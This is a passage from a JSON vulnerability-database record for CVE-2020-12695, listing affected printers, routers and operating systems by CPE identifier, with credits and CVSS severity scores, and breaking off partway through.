"cpe23Uri": "cpe:2.3:h:hp:envy_114_cq812a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_111_cq810a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq809d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_110_cq812c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn517c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn518a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn519a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_100_cn519b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5000_m2u91a:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_5se45b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_5se46a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_6wd14a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6420_6wd16a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6452_5se47a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_pro_6455_5se45a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5020_z4a69a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5030_m2u92b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5030_z4a70a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5034_z4a74a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:5660_f8b04a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5665_f8b06a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5664_f8b08a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7640:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7644_e4w46a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_7645_e4w44a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5640_b9s56a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5640_b9s58a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6540_b9s59a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5642_b9s64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5643_b9s63a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5644_b9s65a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5646_f8b05a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_f2e72a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v47a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v51a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_g0v53a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5540_k7c85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5541_k7g89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5542_k7c88a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5543_n9u88a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5544_k7c89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5544_k7c93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5545_g0v50a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5546_k7c90a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5547_j6u64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5548_k7g87a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_5575_g0v48b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_5575_g0v48c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4535_f0v64c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4536_f0v65a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4538_f0v66b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4675_f1h97c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4676_f1h98a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4678_f1h99b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4511_k9h50a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4512_k9h49a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4513_k9h51a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4516_k9h52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_e6g67a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_e6g67b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v63a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v63b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4520_f0v69a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4521_k9t10b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4522_f0v67a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4523_j6u60b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_f0v71b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_f0v72b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4524_k9t01a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4525_k9t09b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4526_k9t05b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4527_j6u61b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4528_k9t08b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_e6g87a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_f1h96a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4650_f1h96b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_f1j02a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_k9v84b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4652_f1j05b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4654_f1j07b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4654_f1j06b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_f1j00a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_k9v79a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4655_k9v82b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4656_k9v81b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4657_v6d29b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:officejet_4658_v6d30b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5530:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5536:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5531:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5539:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5532:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4515:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5534:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_4518:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_5535:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t81a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t81c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3545_a9t83b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3546_a9t82a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3456_a9t84c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:deskjet_ink_advantage_3548_a9t81b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4509_d3p94a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4509_d3p94b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4501_c8d05a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4502_a9t85a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4502_a9t87b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4503_e6g71b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4504_a9t88b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4504_c8d04a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4505_a9t86a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4507_e6g70b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4508_e6g72b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t80a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t80b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_a9t89a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_4500_d3p93a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_120_cz022c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6220_k7g20d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6220_k7g21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6230_k7g25b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6232_k7g26b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6234_k7s21b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6252_k7g22a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6222_y0k13d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_6222_y0k14d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7830_y0g50b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7822_y0g42d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7822_y0g43d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7120_z3m41d:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7155_z3m52a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_photo_7164_k7g99a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_5se16b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_5se17a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_6wd35a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6020_7cz37a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6052_5se18a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:hp:envy_6055_5se16a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:huawei:hg532e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:huawei:hg255s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nec:wr8165n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:netgear:wnhde111:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ruckussecurity:zonedirector_1200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:tp-link:archer_c50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxv10_w300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zyxel:vmg8324-b10a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:zyxel:amg1202-t10b:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:xbox_one:10.0.19041.2494:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "This vulnerability was reported by Yunus \u00c7adirci from EY Turkey. This document was written by Vijay Sarvepalli. ",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"cve": "CVE-2020-12695",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-165399",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-12695",
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.2,
"impactScore": 4.7,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
